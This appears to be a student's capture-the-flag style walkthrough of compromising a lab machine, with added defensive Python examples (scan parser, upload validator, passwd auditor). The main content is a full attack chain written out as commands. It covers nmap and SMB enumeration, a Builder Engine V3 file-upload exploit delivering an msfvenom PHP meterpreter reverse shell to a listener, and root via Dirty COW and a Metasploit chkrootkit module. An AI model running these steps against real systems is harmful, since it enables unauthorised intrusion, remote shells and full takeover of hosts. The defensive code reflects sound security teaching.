
Exploiting Victim #3: Steps and Tools

The document details steps to scan, enumerate, exploit, and gain root access on a vulnerable system. It describes using nmap to scan for open ports and services, then exploiting a Builder Engine V3 arbitrary file upload vulnerability to upload a reverse PHP shell. Privilege escalation is achieved using Dirty COW and modifying /etc/passwd.

1- Information Gathering (Scanning)

a. Host Discovery ==> nmap [Link]/24 -sn -n -T5


b.1 Port Scanning ==> nmap -F -T5 -n [Link]
b.2 Detailed scan ==> nmap [Link] -p- -T5 -n -sV

Victim #3 ==> [Link]

nmap [Link] -p- -T5 -n -sV

nmap [Link] -p- -T5 -n -sV -A ==> more details
nmap [Link] -p- -T5 -n
nmap -sV -T5 -A -O -p1-65535 [Link]

2- Enumeration >> BuilderEngine is the most interesting exploitable service we found

22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
110/tcp open pop3
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: [Link] (Oracle VirtualBox virtual NIC)
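The port table above is nmap's human-readable (normal) output. As an added example that is not part of these notes, the Python below parses such lines into records, groups the open ports by service and lists the ports that got no version banner, so the "for each port we need to enumerate" list later on can be produced from the scan instead of copied by hand. The sample input is the table above with its wrapped lines rejoined; the MAC address in it is a placeholder, not the lab machine's.

```python
import re

# Constructed sample: the port table from the notes above with its two wrapped
# lines rejoined; the MAC address is a placeholder, not the lab machine's.
SAMPLE_SCAN = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain      ISC BIND 9.9.5-3 (Ubuntu Linux)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
110/tcp  open  pop3
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd
445/tcp  open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd
995/tcp  open  ssl/pop3
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:00:00:01 (Oracle VirtualBox virtual NIC)
"""

# One nmap "normal output" port line: "<port>/<proto>  <state>  <service>  [<version>]".
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>\S.*?))?\s*$"
)


def parse_port_lines(text):
    """Return one dict per port line; the header, MAC and OS lines are skipped."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        service = m.group("service")
        tls = service.startswith("ssl/")          # nmap prints "ssl/imap" for TLS-wrapped services
        records.append({
            "port": int(m.group("port")),
            "proto": m.group("proto"),
            "state": m.group("state"),
            "service": service[4:] if tls else service,
            "tls": tls,
            "version": m.group("version"),          # None when -sV could not fingerprint it
        })
    return records


def services_by_name(records, state="open"):
    """Group open ports by service so each service family gets its own enumeration pass."""
    grouped = {}
    for r in records:
        if r["state"] == state:
            grouped.setdefault(r["service"], []).append(r["port"])
    return {name: sorted(ports) for name, ports in grouped.items()}


def unversioned_ports(records):
    """Ports with no version banner: -sV told us nothing, so they need a manual check."""
    return [r["port"] for r in records if r["version"] is None]


if __name__ == "__main__":
    recs = parse_port_lines(SAMPLE_SCAN)
    for name, ports in sorted(services_by_name(recs).items()):
        print(f"{name:12} {ports}")
    print("no banner:", unversioned_ports(recs))
```

Running it on the sample groups 80 and 8080 under http, 139 and 445 under netbios-ssn, and reports 110 and 995 as the ports with no banner, which is exactly the pop3 pair the scan above could not identify.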

# smbmap -H [Link]
# smbclient //[Link]/print$ ==> password: IPC$

USERS: (viper, crackmeforpoints, root, firefart, monther, nobody)

Builder Engine V3
Arbitrary File Upload vulnerability
- This allows us to take any file from our Kali machine and throw it onto the server; once it is on the server we will have a malware file at [Link]/files/[Link]
- Then, when we access (activate) this backdoor, it opens a connection back to my Kali
- Steps:
1- msfvenom > [Link] (an application that helps write malware; we don't actually write the malware ourselves, it gives us the PHP code). The PHP code is put on the PHP web server and will connect back to our machine to open a session

2- Form to upload the malware backdoor to the Builder Engine V3 web app (this form exploits the Arbitrary File Upload vulnerability). After it is uploaded to the server we need a listener

3- Set up the listener (receiver): msfconsole meterpreter (prepare a payload)

4- Activate the backdoor (without a listener the backdoor tries to connect to something that does not exist)

5- Find the OS, upload the privilege escalation malware and get root
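The flaw described above is that the upload form stores whatever file name and bytes the client sends under a web-served /files/ directory. As an added example that is neither BuilderEngine's code nor part of these notes, the Python below contrasts that behaviour with a hypothetical hardened gate of the kind a developer fixing this class of bug would add: the stored name is random, its extension comes from the detected content type, and every extension in the client's name chain is checked. The extension list, magic bytes, directory name and all inputs are assumptions constructed for the example.

```python
import secrets
from pathlib import PurePosixPath

# Extensions the web server would hand to an interpreter if they landed under a served path.
SERVER_SIDE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
                    "jsp", "jspx", "asp", "aspx", "cgi", "pl", "py", "sh"}

# Types this hypothetical form is meant to accept, recognised by leading bytes (magic),
# not by the name the client chose.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

UPLOAD_DIR = "files"   # assumed name of the served directory the notes' /files/ link points at


def vulnerable_store_path(filename, content):
    """The behaviour the notes exploit: whatever name and bytes arrive are written
    under the served directory, so a .php upload becomes a reachable script."""
    return f"{UPLOAD_DIR}/{filename}"


class UploadRejected(ValueError):
    pass


def hardened_store_path(filename, content):
    """Hypothetical replacement: accept only recognised image bytes, refuse any
    server-side extension anywhere in the name, and never reuse the client's name."""
    base = PurePosixPath(filename).name            # drop ../ and directory parts
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise UploadRejected("missing or hidden extension")
    # check every extension in the chain: shell.php.jpg is refused as well as shell.php
    if any(p in SERVER_SIDE_EXTS for p in parts[1:]):
        raise UploadRejected("server-executable extension")
    kind = next((k for magic, k in IMAGE_MAGIC.items() if content.startswith(magic)), None)
    if kind is None:
        raise UploadRejected("content is not an allowed image type")
    # stored name is random and its extension comes from the detected type, not the client
    return f"{UPLOAD_DIR}/{secrets.token_hex(16)}.{kind}"


def reject_reason(filename, content):
    """Return None if the hardened gate accepts the upload, else the reason it refuses."""
    try:
        hardened_store_path(filename, content)
    except UploadRejected as e:
        return str(e)
    return None


if __name__ == "__main__":
    # Constructed inputs: a PHP-looking file with a harmless body and a real PNG header.
    php_like = b"<?php echo 'test'; ?>"
    png_like = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    for name, data in [("backdoor.php", php_like), ("shell.php.jpg", png_like),
                       ("photo.jpg", php_like), ("photo.png", png_like)]:
        print(f"{name:15} vulnerable -> {vulnerable_store_path(name, data)!r:25} "
              f"hardened -> {reject_reason(name, data)}")
```

The important design point is that the hardened path never trusts the client's name for anything: the extension is derived from the bytes, the directory part is discarded, and the stored name is unguessable, so even a file that passes the checks cannot be addressed by the name the uploader chose.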

For each port we need to enumerate:

dirb [Link]
nikto -h [Link]
nikto -h [Link] ==>> enumerate this port
smbclient

enum4linux [Link]
- Users found from enumeration:
S-1-22-1-1000 Unix User\crackmeforpoints (Local User)
S-1-22-1-1001 Unix User\monther (Local User)
viber
firefart
root

In the web browser ==> search Exploit-DB for builderengine v3 ==> Arbitrary File Upload (php)

Download the exploit, which opens the code ==> change the local host to [Link] (IP of the victim) >> save it as [Link]
In Firefox => search for: msfvenom reverse tcp php

man msfvenom

- Creating the Malware:

#msfvenom -p php/meterpreter/reverse_tcp LHOST=[Link] LPORT=5555 -f raw > [Link]
#cd /home/fatema/Desktop/V3
#ls
Then, open the upload exploit in the V3 folder ==> choose the backdoor file and send it
copy this ==> http://[Link]/files/[Link] >> http://[Link]/files/[Link]
This will create the backdoor malware
Open a command window and type:
#msfconsole
#use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set LHOST [Link] ==> setting my Kali IP
set LPORT 5555 ==>> setting the port I want to open on my Kali
show options
exploit
Open the web browser and paste this (copied from the page where we sent the php code): http://[Link]/files/[Link]
In the command window it shows that the TCP handler has started
It should open a meterpreter session; then type ==> ?
in meterpreter type sysinfo ==>> to get the system information
shell
ls
pwd
id

pwd
cd ..
ls
cd ..
ls ==> we have the [Link]
cat [Link]
pwd
cd /home
ls
exit

3- Privilege Escalation
open the web browser and search for: Linux 3.13 dirtycow exploit DB >> it is the Dirty COW vulnerability; it uses the pokemon exploit
[Link]

open another Dirty COW exploit and copy this: [Link]


echo 0 > /proc/sys/vm/dirty_writeback_centisecs

open a new command window ==> ssh firefart@[Link] but don't hit enter yet
go back to the main command window
pwd
cd /tmp
upload /home/fatema/Desktop/V3/dc.c

ls
shell
ls
gcc dc.c -lcrypt -pthread -o exploit

./exploit 12 ==> hit enter


go back to the ssh window and hit enter; the password is 12
then paste ==> echo 0 > /proc/sys/vm/dirty_writeback_centisecs
whoami
id
cd /root
ls
cat [Link]
cd /tmp
ls
cp [Link] /etc/passwd
cd /root
ls
cd chkrootkit/
ls
exit
exit
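The Dirty COW step above ends with /etc/passwd being rewritten and then put back from a copy. As an added example that comes from neither these notes nor any exploit, the Python below is the check a defender would run on a host like this one: it flags a second UID 0 account, a hash stored in the passwd field instead of /etc/shadow, an empty password field, a missing root entry or a malformed line, and it diffs the file against a known-good copy so that both an appended entry and a replaced root line show up. Both passwd texts are constructed for the example and the hash string is a placeholder.

```python
# Constructed baseline: a trimmed /etc/passwd as shipped (shadow passwords, one UID-0 account).
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
crackmeforpoints:x:1000:1000::/home/crackmeforpoints:/bin/bash
monther:x:1001:1001::/home/monther:/bin/bash
"""

# Constructed tampered copy: an extra UID-0 user whose hash sits in the passwd file itself
# (the hash string is a placeholder, not a real crypt output).
TAMPERED_PASSWD = BASELINE_PASSWD + "firefart:$6$constructed$PLACEHOLDERHASH:0:0:constructed:/root:/bin/bash\n"

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text):
    """Return (line_number, record_or_None) pairs; None marks a line with the wrong field count."""
    out = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != len(FIELDS):
            out.append((n, None))
            continue
        out.append((n, dict(zip(FIELDS, fields))))
    return out


def audit_passwd(text):
    """Return (name, finding) tuples for the conditions a rewritten passwd file produces."""
    findings = []
    seen = set()
    for n, rec in parse_passwd(text):
        if rec is None:
            findings.append((f"line {n}", "malformed"))
            continue
        name = rec["name"]
        if name in seen:
            findings.append((name, "duplicate-user"))
        seen.add(name)
        pw = rec["passwd"]
        if pw == "":
            findings.append((name, "empty-password"))          # login with no password at all
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append((name, "hash-in-passwd"))          # hash belongs in /etc/shadow
        if not rec["uid"].isdigit():
            findings.append((name, "malformed"))
        elif rec["uid"] == "0" and name != "root":
            findings.append((name, "extra-uid0"))              # a second superuser account
    if "root" not in seen:
        findings.append(("root", "missing-root"))              # root line overwritten or removed
    return findings


def diff_passwd(baseline_text, current_text):
    """Compare against a known-good copy: (added, removed, changed) user names."""
    base = {r["name"]: r for _, r in parse_passwd(baseline_text) if r}
    cur = {r["name"]: r for _, r in parse_passwd(current_text) if r}
    added = sorted(set(cur) - set(base))
    removed = sorted(set(base) - set(cur))
    changed = sorted(n for n in set(base) & set(cur) if base[n] != cur[n])
    return added, removed, changed


if __name__ == "__main__":
    for label, text in (("baseline", BASELINE_PASSWD), ("tampered", TAMPERED_PASSWD)):
        print(label, audit_passwd(text))
    print("diff:", diff_passwd(BASELINE_PASSWD, TAMPERED_PASSWD))
```

The two functions are deliberately independent: audit_passwd needs no baseline and catches the structural symptoms on its own, while diff_passwd catches quieter edits (a changed shell or home directory) that only a known-good copy can reveal; on a real host the baseline would be the copy taken before the change, as the notes restore it from one.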

cd /root
cd /etc/chkrootkit
ls
cat READMEFILE
background
search chkrootkit
info exploit/unix/local/chkrootkit
use exploit/unix/local/chkrootkit
show sessions
set session 1
options
exploit
